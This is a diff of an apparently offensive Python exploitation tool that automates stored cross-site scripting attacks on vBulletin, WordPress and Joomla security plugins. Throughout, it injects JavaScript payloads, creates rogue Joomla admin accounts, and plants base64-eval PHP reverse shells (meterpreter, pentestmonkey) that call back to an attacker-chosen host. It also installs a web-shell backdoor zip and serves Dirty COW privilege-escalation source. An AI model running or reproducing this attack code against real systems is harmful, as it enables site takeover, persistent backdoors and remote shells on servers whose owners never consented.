> "+fontcolors.ENDC) - striptarget = re.compile('(http://|https://)') - newtarget = striptarget.sub('', target_link) - striptarget2 = re.compile('/.*') - finaltarget = striptarget2.sub('', newtarget) - #print finaltarget - # DEBUG: Should return e.g. mycompany.com.au - try: - server = HTTPServer((localhost, http_port), MyHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving attack file from: http://%s:%s/%s.php ' % (localhost,http_port,evil_php) - print ' [*] Serving payload file from: http://%s:%s/%s.js ' % (localhost,http_port,evil_jsf) - print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+'misc.php?activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: # Get all the unexpected keyboard interrupts - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - server.socket.close() - sys.exit(1) - except KeyboardInterrupt: # Get all the unexpected keyboard interrupts - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - elif exploit == 'BetterWPSecurity': - try: - global activation_file - if payload_selection == 'wp_hello_plugin': - activation_file = "/wp-content/plugins/hello.php?" - elif payload_selection == 'wp_footer_theme': - activation_file = "/?" - elif payload_selection == 'wpseo': - activation_file = "/robots.txt?" 
- else: - activation_file = "Unknown Payload - Restart Script" - sys.exit() - unencoded_payload = '' - base64_payload = '">' - fourohfour_url = "%s%s%s.php?" % (random.randrange(0, 235),random.randrange(1, 214),random.randrange(0, 135)) - try: - conn = httplib.HTTPConnection(target_hostname, 80) - conn.request("GET", "/"+fourohfour_url+base64_payload) - resp = conn.getresponse() - output = resp.read() - if resp.status == 404: - print "\n [*] 404 received, checking that WordPress handled the error." - if re.search("(That page can)", output): - print " [*] It looks like WordPress handled the injection." - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. - try: - server = HTTPServer((localhost, http_port), WordPressHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving payload file from: http://%s:%s/x.js ' % (localhost,http_port) - print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+'activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: - server.socket.close() - sys.exit() - else: - print " [!] The web server handled the 404 error page, meaning the injection did not occur within Better WP Security." - except Exception as e: - print " [!] An error occurred: %s\n[!] Shutting down." % e - sys.exit(1) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] 
CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - elif exploit == 'SecurityCheck': - try: - if payload_selection == 'add_new_admin': - activation_file = "NOT_APPLICABLE" + filepointer = open('/tmp/xsser.rc', 'w') + filepointer.write(user_input) + filepointer.close() + + +# Preferably, this function will load/import the selected exploit module and execute it in the future. +# def handle_exploit(exploit, js_payload, localhost): +def handle_exploit(exploit, localhost): + global js_filename + if exploit == 'vBSEO': + try: + global evil_php + global evil_jsf + global xss_title + global target_link + global finaltarget + global http_port + global activation_file # This may not be needed for the vBSEO module + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. + # TODO: Consider making the xsser.py tool automatically send this exploit. + # TODO: Make a "random filename" function. + evil_php = "".join(random.sample(random_filename, 9)) + evil_jsf = "".join(random.sample(random_filename, 9)) + xss_title = 'The Friendly Website" size="70" dir="ltr" tabindex="1">
> " + FontColors.ENDC) + striptarget = re.compile('(http://|https://)') + newtarget = striptarget.sub('', target_link) + striptarget2 = re.compile('/.*') + finaltarget = striptarget2.sub('', newtarget) + # print finaltarget + # DEBUG: Should return e.g. mycompany.com.au + try: + server = HTTPServer((localhost, http_port), MyHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving attack file from: http://{}:{}/{}.php '.format(localhost, http_port, evil_php) + print ' [*] Serving payload file from: http://{}:{}/{}.js '.format(localhost, http_port, evil_jsf) + print ' [!] Browse to: "' + FontColors.BLUE + FontColors.BOLD + 'misc.php?activateshell=true' + \ + FontColors.ENDC + '", to activate the payload.' + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format(localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format(localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: # Get all the unexpected keyboard interrupts + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + # server.socket.close() # I don't think there's anything to close if the server class fails. + exit_xsser(1) + except socket_error: + print " [!] A socket error occurred. Please check the listening IP address again." + exit_xsser(1) + except KeyboardInterrupt: # Get all the unexpected keyboard interrupts + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." 
+ FontColors.ENDC + exit_xsser(1) + elif exploit == 'BetterWPSecurity': + try: + global activation_file + if payload_selection == 'wp_hello_plugin': + activation_file = "/wp-content/plugins/hello.php" # Removed '?' for requests.get() + elif payload_selection == 'wp_footer_theme': + activation_file = "/" # Removed '?' for requests.get() + elif payload_selection == 'wpseo': + activation_file = "/robots.txt" # Removed '?' for requests.get() + else: + activation_file = "Unknown Payload - Restart Script" + exit_xsser() + + js_filename = "".join(random.sample(random_filename, 5))+".js" # 5 letters/numbers + unencoded_payload = '' + base64_payload = '">' + + fourohfour_url = "".join(random.sample(random_filename, 7)) + ".php" # Simpler and more random + # Removed trailing "?" as requests.get() handles that. + + try: + # TODO: Use python requests here instead. + # TODO: The previous code below is still there for testing purposes. + # TODO: You can remove the old code once the new code is 100% working. + # conn = httplib.HTTPConnection(target_hostname, 80) + # conn.request("GET", "/" + fourohfour_url + base64_payload) + # resp = conn.getresponse() + # output = resp.read() + + # Python 'requests' hack to send params unencoded. + url = "http://{}/{}".format(target_hostname, fourohfour_url) + s = requests.Session() + req = requests.Request(method='GET', url=url) + prep = req.prepare() + prep.url = url + base64_payload + r = s.send(prep) + # print resp.url # FUTURE DEBUG + output = r.text + + if r.status_code == 404: + print "\n [*] 404 received, checking that WordPress handled the error." + if re.search("(That page can)", output): + print " [*] It looks like WordPress handled the injection." + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. 
+ try: + server = HTTPServer((localhost, http_port), WordPressHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving payload file from: http://{}:{}/{}'.format( + localhost, http_port, js_filename) + print ' [!] Browse to: "' + FontColors.BLUE + FontColors.BOLD + activation_file + \ + '?activateshell=true' + FontColors.ENDC + '", to activate the payload.' + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format( + localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format( + localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: + # server.socket.close() + exit_xsser() + else: + print " [!] The web server handled the 404 error page, meaning the injection did not " \ + "occur within Better WP Security." + except Exception as error: + print " [!] An error occurred: {}\n [!] Shutting down.".format(error) + traceback.print_exc() + # print "Localhost variable: {}".format(localhost) # DEBUG + exit_xsser(1) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) + elif exploit == 'SecurityCheck': + try: + if payload_selection == 'add_new_admin': + activation_file = "NOT_APPLICABLE" + elif payload_selection == 'install_backdoor': + activation_file = "NOT_APPLICABLE" + # "/index.php?option=com_helloshell&" + # TODO: Make it possible to use meterpreter or the reverse PHP shell in the future. + # TODO: Activation should be 100% automatic like the other payloads. 
+ + else: + activation_file = "Unknown Payload - Restart Script" + exit_xsser() + js_filename = "".join(random.sample(random_filename, 5))+".js" # 5 letters/numbers + unencoded_payload = '' + # + # urlencoded_payload = urllib.quote_plus(unencoded_payload) # Remove if new code is working. + + # exploit_url = "index.php?option=" + exploit_url = "index.php" # New URL when using requests.get() + try: + + payload = {"option": unencoded_payload} + url = "http://{}/{}".format(target_hostname, exploit_url) + resp = requests.get(url, params=payload, timeout=3) + output = resp.text + + if resp.status_code == 400: + print "\n [*] 400 received, checking that Joomla SecurityCheck handled the error." + if re.search("(It has been detected a sequence that could mean a hacker attack)", output): + print " [*] It looks like Joomla SecurityCheck handled the injection." + http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. + try: + server = HTTPServer((localhost, http_port), WordPressHandler) + print FontColors.BLUE + FontColors.BOLD + '\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' + print '\tâ•‘ Started Payload HTTP Server â•‘' + print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' + print FontColors.ENDC + print ' [*] Serving payload file from: http://{}:{}/{} '.format( + localhost, http_port, js_filename) + # print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+' + # activateshell=true'+fontcolors.ENDC+'", to activate the payload.' + if joomla_username is not "NOT_APPLICABLE": + print ' [!] Your username is: ' + FontColors.BLUE + FontColors.BOLD + \ + joomla_username + FontColors.ENDC + ' ' + if joomla_password is not "NOT_APPLICABLE": + print ' [!] Your password is: ' + FontColors.BLUE + FontColors.BOLD + \ + joomla_password + FontColors.ENDC + ' ' + # TODO: Backdoor filename should be dynamic in the future. + print ' [!] 
Backdoor Link: http://{}:{}/Hello_Shell.zip'.format(localhost, http_port) + print ' [+] DCOW (SUID) 32-bit src is available at: http://{}:{}/dcow32.c'.format( + localhost, http_port) + print ' [+] DCOW (SUID) 64-bit src is available at: http://{}:{}/dcow64.c'.format( + localhost, http_port) + print ' [?] Press CTRL+C to stop the server and exit the script. \n' + print '-------------- HTTP Requests Below --------------' + server.serve_forever() + except KeyboardInterrupt: + # server.socket.close() + exit_xsser() + else: + print " [!] The web server handled the 400 error page, meaning the injection did not " \ + "occur within Joomla SecurityCheck." + except Exception as error: + print " [!] An error occurred: {}\n [!] Shutting down.".format(error) + traceback.print_exc() + # print "Localhost variable: {}".format(localhost) # DEBUG + exit_xsser(1) + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser(1) else: - activation_file = "Unknown Payload - Restart Script" - sys.exit() - unencoded_payload = '' # - urlencoded_payload = urllib.quote_plus(unencoded_payload) - exploit_url = "index.php?option=" - try: - conn = httplib.HTTPConnection(target_hostname, 80) - conn.request("GET", "/"+exploit_url+urlencoded_payload) - resp = conn.getresponse() - output = resp.read() - if resp.status == 400: - print "\n [*] 400 received, checking that Joomla SecurityCheck handled the error." - if re.search("(It has been detected a sequence that could mean a hacker attack)", output): - print " [*] It looks like Joomla SecurityCheck handled the injection." - http_port = 80 # Port to listen on. Does not really need to be dynamic at the moment. 
- try: - server = HTTPServer((localhost, http_port), WordPressHandler) - print fontcolors.BLUE+fontcolors.BOLD+'\n\tâ•”â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•—' - print '\tâ•‘ Started Payload HTTP Server â•‘' - print '\tâ•šâ•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•â•' - print fontcolors.ENDC - print ' [*] Serving payload file from: http://%s:%s/x.js ' % (localhost,http_port) - #print ' [!] Browse to: "'+fontcolors.BLUE+fontcolors.BOLD+activation_file+'activateshell=true'+fontcolors.ENDC+'", to activate the payload.' - print ' [!] Your username is: '+fontcolors.BLUE+fontcolors.BOLD+joomla_username+fontcolors.ENDC+' ' - print ' [!] Your password is: '+fontcolors.BLUE+fontcolors.BOLD+joomla_password+fontcolors.ENDC+' ' - print ' [+] DCOW (SUID) 32-bit src is available at: http://%s:%s/dcow32.c' % (localhost,http_port) - print ' [+] DCOW (SUID) 64-bit src is available at: http://%s:%s/dcow64.c' % (localhost,http_port) - print ' [?] Press CTRL+C to stop the server and exit the script. \n' - print '-------------- HTTP Requests Below --------------' - server.serve_forever() - except KeyboardInterrupt: - server.socket.close() - sys.exit() - else: - print " [!] The web server handled the 400 error page, meaning the injection did not occur within Joomla SecurityCheck." - except Exception as e: - print " [!] An error occurred: %s\n[!] Shutting down." % e - sys.exit(1) - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit(1) - else: - print " [!] Invalid exploit, quitting." - sys.exit() + print " [!] Invalid exploit, quitting." 
+ exit_xsser() + # Update JavaScript payload -def updateJavaScriptPayload(payload_type,php_input): - global target_hostname # Version 2.5 Messy Fix - target_hostname = '' - try: - if payload_type == 'vb_misc': - payload_file = open("Payloads/javascript/vbulletin_legacy.js") # Misc_Start vBulletin Hook (misc.php) - elif payload_type == 'wpseo': - payload_file = open("Payloads/javascript/wordpress_legacy.js") # WPSEO (robots.txt and .htaccess) - # Version 2.5 messy fix for callback in JS files for WordPress - Clean up later - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - elif payload_type == 'wp_footer_theme': - payload_file = open("Payloads/javascript/wordpress_theme.js") # WordPress Core Theme (footer.php) - # Version 2.5 messy fix for TARGETWEBSITE in JS files - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - elif payload_type == 'wp_hello_plugin': - payload_file = open("Payloads/javascript/wordpress_plugin.js") # WordPress Core Plugin (hello.php) - # Version 2.5 messy fix for TARGETWEBSITE in JS files - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") - # NEW JOOMLA EXPLOIT BELOW - elif payload_type == 'add_new_admin': - print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" - target_hostname = raw_input(" [?] Hostname: ") +def update_javascript_payload(payload_type, php_input): + global target_hostname # Version 2.5 Messy Fix + global http_port global joomla_username global joomla_password - payload_file = open("Payloads/javascript/joomla_admin.js") # Joomla Add New Super User (admin) - prompt1 = raw_input(" [?] Enter shown name: ") - prompt2 = raw_input(" [?] Enter a username: ") - prompt3 = raw_input(" [?] Enter a password: ") - prompt4 = raw_input(" [?] 
Enter an email : ") - joomla_username = prompt2 - joomla_password = prompt3 - prompt1_reg = re.compile('(VAR_SHOWN_NAME)') - prompt2_reg = re.compile('(VAR_USER_NAME)') - prompt3a_reg = re.compile('(VAR_PASSWORD_1)') - prompt3b_reg = re.compile('(VAR_PASSWORD_2)') - prompt4_reg = re.compile('(VAR_EMAIL)') - stage1 = prompt1_reg.sub(prompt1, payload_file.read()) - stage2 = prompt2_reg.sub(prompt2, stage1) - stage3a = prompt3a_reg.sub(prompt3, stage2) - stage3b = prompt3b_reg.sub(prompt3, stage3a) - stage4 = prompt4_reg.sub(prompt4, stage3b) - callbackhost_reg = re.compile('(CALLBACKHOST)') - callbackport_reg = re.compile('(CALLBACKPORT)') - stage5 = callbackhost_reg.sub(lhost, stage4) - stage6 = callbackport_reg.sub("80", stage5) - return stage6 # Need to return early for this exploit/payload - else: - print " [!] Invalid payload, quitting." - sys.exit() - http_port = "80" # Port to listen on. Does not really need to be dynamic at the moment. - payload_replace = re.compile('(PHP_PAYLOAD)') - payload_stage1 = payload_replace.sub(php_input, payload_file.read()) - hostname_replace = re.compile('(TARGETWEBSITE)') - payload_stage2 = hostname_replace.sub(target_hostname, payload_stage1) - callbackhost_replace = re.compile('(CALLBACKHOST)') - payload_stage3 = callbackhost_replace.sub(lhost, payload_stage2) - callbackport_replace = re.compile('(CALLBACKPORT)') - payload_stage4 = callbackport_replace.sub(http_port, payload_stage3) - return payload_stage4 - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - -# Based on the vbseo.py preparePayload function -# Optimise in a future version -def preparePayload(option): - try: - global lhost - global lport - if option == 'meterpreter': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] 
Enter a listening port: ") - payload_shell = open('Shells/meterpreter/meterpreter.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripspace = re.compile('[\t\n\r]') - filepart2 = stripspace.sub('', add_port) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'pentestmonkey': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] Enter a listening port: ") - payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripcomments = re.compile('//.*?\n|/\*.*?\*/') - filepart1 = stripcomments.sub('', add_port) - stripspace = re.compile('[\t\n]') - filepart2 = stripspace.sub('', filepart1) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'pentestmonkey_notify': - preparePayloadBanner() - lhost = raw_input(" [?] Enter a listening IP: ") - lport = raw_input(" [?] 
Enter a listening port: ") - payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php') - find_host = re.compile('(LOCALHOST)') - add_host = find_host.sub(lhost,payload_shell.read()) - find_port = re.compile('(LOCALPORT)') - add_port = find_port.sub(lport,add_host) - stripcomments = re.compile('//.*?\n|/\*.*?\*/') - filepart1 = stripcomments.sub('', add_port) - stripspace = re.compile('[\t\n]') - filepart2 = stripspace.sub('', filepart1) - payload_input_shell = "if($_GET['activateshell']=='true') { %s } " % filepart2 - payload_insert = "eval(base64_decode(\""+base64.b64encode(payload_input_shell)+"\"));" - return payload_insert - elif option == 'payload_not_specified': - preparePayloadBanner() - payload_insert = " " - lport = 4321 - lhost = raw_input(" [?] Enter a listening IP: ") - return payload_insert - else: - print " [!] Invalid payload, quitting." - sys.exit() - except KeyboardInterrupt: - print fontcolors.YELLOW + "\n [!] CTRL+C detected, shutting down." + fontcolors.ENDC - sys.exit() - + target_hostname = '' + payload_file = '' + try: + if payload_type == 'vb_misc': + payload_file = open("Payloads/javascript/vbulletin_legacy.js") # Misc_Start vBulletin Hook (misc.php) + elif payload_type == 'wpseo': + payload_file = open("Payloads/javascript/wordpress_legacy.js") # WPSEO (robots.txt and .htaccess) + # Version 2.5 messy fix for callback in JS files for WordPress - Clean up later + # TODO: Ask for the full URL with HTTP or HTTPS. + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + elif payload_type == 'wp_footer_theme': + payload_file = open("Payloads/javascript/wordpress_theme.js") # WordPress Core Theme (footer.php) + # Version 2.5 messy fix for TARGETWEBSITE in JS files + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] 
Hostname: ").strip(" ") + elif payload_type == 'wp_hello_plugin': + payload_file = open("Payloads/javascript/wordpress_plugin.js") # WordPress Core Plugin (hello.php) + # Version 2.5 messy fix for TARGETWEBSITE in JS files + # TODO: Make this into a function like target_hostname = ask_for_target() + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + elif payload_type == 'add_new_admin': + print " [?] Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + # global joomla_username + # global joomla_password + payload_file = open("Payloads/javascript/joomla_admin.js") # Joomla - Add New Super User (admin) + prompt1 = raw_input(" [?] Enter shown name: ") + prompt2 = raw_input(" [?] Enter a username: ") + prompt3 = raw_input(" [?] Enter a password: ") + prompt4 = raw_input(" [?] Enter an email : ") + joomla_username = prompt2 + joomla_password = prompt3 + # TODO: Consider simplifying this + # https://stackoverflow.com/questions/6116978/how-to-replace-multiple-substrings-of-a-string + prompt1_reg = re.compile('(VAR_SHOWN_NAME)') + prompt2_reg = re.compile('(VAR_USER_NAME)') + prompt3a_reg = re.compile('(VAR_PASSWORD_1)') + prompt3b_reg = re.compile('(VAR_PASSWORD_2)') + prompt4_reg = re.compile('(VAR_EMAIL)') + stage1 = prompt1_reg.sub(prompt1, payload_file.read()) + stage2 = prompt2_reg.sub(prompt2, stage1) + stage3a = prompt3a_reg.sub(prompt3, stage2) + stage3b = prompt3b_reg.sub(prompt3, stage3a) + stage4 = prompt4_reg.sub(prompt4, stage3b) + callbackhost_reg = re.compile('(CALLBACKHOST)') + callbackport_reg = re.compile('(CALLBACKPORT)') + stage5 = callbackhost_reg.sub(lhost, stage4) + stage6 = callbackport_reg.sub("80", stage5) + # TODO: End of major future rewrite. + return stage6 # Need to return early for this exploit/payload + # NEW JOOMLA PAYLOAD + elif payload_type == 'install_backdoor': + print " [?] 
Enter the target hostname/FQDN\n [?] e.g. www.target.com.au" + target_hostname = raw_input(" [?] Hostname: ").strip(" ") + # global joomla_username + # global joomla_password + joomla_username = "NOT_APPLICABLE" + joomla_password = "NOT_APPLICABLE" + payload_file = open("Payloads/javascript/joomla_backdoor.js") + # TODO: The user should be allowed to select meterpreter for the Joomla backdoor, and + # TODO: in that case, also make the payload 100% automatic like the others. + # TODO: Consider adding new WordPress payloads that add new themes/plugins with + # TODO: automatic self-removal upon exit. + print " [*] Using semi-automatic Joomla backdoor. \n" \ + " [*] Example: /index.php?option=com_helloshell&c64=bHMgLWFs \n" \ + " [*] Example: /index.php?option=com_helloshell&c=ls" + attacker_url = "http://{}:{}/{}".format(lhost, "80", "Hello_Shell.zip") + # TODO: Listening port and filename should be dynamic in the future. + # print " DEBUG: Attacker URL: %s" % attacker_url + # TODO: Another important future rewrite + prompt0_reg = re.compile('(VAR_BACKDOOR_URL)') + stage1 = prompt0_reg.sub(attacker_url, payload_file.read()) + callbackhost_reg = re.compile('(CALLBACKHOST)') + callbackport_reg = re.compile('(CALLBACKPORT)') + stage2 = callbackhost_reg.sub(lhost, stage1) + stage3 = callbackport_reg.sub("80", stage2) + # End major rewrite. + return stage3 + else: + print " [!] Invalid payload, quitting." + exit_xsser() + http_port = "80" # Port to listen on. Does not really need to be dynamic at the moment. 
+ # TODO: Future section rewrite + payload_replace = re.compile('(PHP_PAYLOAD)') + payload_stage1 = payload_replace.sub(php_input, payload_file.read()) + hostname_replace = re.compile('(TARGETWEBSITE)') + payload_stage2 = hostname_replace.sub(target_hostname, payload_stage1) + callbackhost_replace = re.compile('(CALLBACKHOST)') + payload_stage3 = callbackhost_replace.sub(lhost, payload_stage2) + callbackport_replace = re.compile('(CALLBACKPORT)') + payload_stage4 = callbackport_replace.sub(http_port, payload_stage3) + # End section rewrite. + return payload_stage4 + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." + FontColors.ENDC + exit_xsser() + + +# Choose IP address to listen on and update PHP payload +# TODO: Optimize in a future version +def prepare_payload(option): + try: + global lhost + global lport + global_ip_address = get_local_ip() + if option == 'meterpreter': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] Enter a listening port: ") + payload_shell = open('Shells/meterpreter/meterpreter.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripspace = re.compile('[\t\n\r]') + filepart2 = stripspace.sub('', add_port) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'pentestmonkey': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? 
(y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] Enter a listening port: ") + payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripcomments = re.compile('//.*?\n|/\*.*?\*/') + filepart1 = stripcomments.sub('', add_port) + stripspace = re.compile('[\t\n]') + filepart2 = stripspace.sub('', filepart1) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'pentestmonkey_notify': + prepare_payload_banner() + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + lport = raw_input(" [?] 
Enter a listening port: ") + payload_shell = open('Shells/php-reverse-shell-1.0/php-reverse-shell-notify.php') + find_host = re.compile('(LOCALHOST)') + add_host = find_host.sub(lhost, payload_shell.read()) + find_port = re.compile('(LOCALPORT)') + add_port = find_port.sub(lport, add_host) + stripcomments = re.compile('//.*?\n|/\*.*?\*/') + filepart1 = stripcomments.sub('', add_port) + stripspace = re.compile('[\t\n]') + filepart2 = stripspace.sub('', filepart1) + payload_input_shell = "if($_GET['activateshell']=='true') {{ {} }} ".format(filepart2) + payload_insert = "eval(base64_decode(\"" + base64.b64encode(payload_input_shell) + "\"));" + return payload_insert + elif option == 'payload_not_specified': + prepare_payload_banner() + payload_insert = " " + lport = 4321 + use_local_ip = raw_input(" [?] Would you like to use the following IP: {}? (y/n) " + .format(get_colored_ip(global_ip_address))) + if use_local_ip == "y": + lhost = global_ip_address + if use_local_ip == "n": + lhost = raw_input(" [?] Enter a listening IP: ") + return payload_insert + else: + print " [!] Invalid payload, quitting." + exit_xsser() + except KeyboardInterrupt: + print FontColors.YELLOW + "\n [!] CTRL+C detected, shutting down." 
+ FontColors.ENDC + exit_xsser() # ====================== # # MENU DEFINITIONS # ====================== # - + # Menu definition menu_actions = { - 'main_menu': main_menu, - '1': menu1, - '2': menu2, - '3': menu3, - '9': back, - 'q': exit, + 'main_menu': main_menu, + '1': menu1, + '2': menu2, + '3': menu3, + '9': back, + 'q': exit_xsser, } vbulletin_menu = { - '1': vbmenu1, - '9': back, - 'q': exit, + '1': vbmenu1, + '9': back, + 'q': exit_xsser, } wordpress_menu = { - '1': wpmenu1, - '2': wpmenu2, - '3': wpmenu3, - '9': back, - 'q': exit, + '1': wpmenu1, + '2': wpmenu2, + '3': wpmenu3, + '9': back, + 'q': exit_xsser, } joomla_menu = { - '1': jmenu1, - '9': back, - 'q': exit, + '1': jmenu1, + '2': jmenu2, + '9': back, + 'q': exit_xsser, } payload_menu = { - '1': meterpreter, - '2': pentestmonkey, - '3': pentestmonkey_notify, - '5': payload_not_specified, - '9': back, - 'q': exit, + '1': meterpreter, + '2': pentestmonkey, + '3': pentestmonkey_notify, + '5': payload_not_specified, + '9': back, + 'q': exit_xsser, } # ====================== # @@ -811,5 +1126,9 @@ def preparePayload(option): # Main Program if __name__ == "__main__": - # Launch our main menu - main_menu() + # Generate the 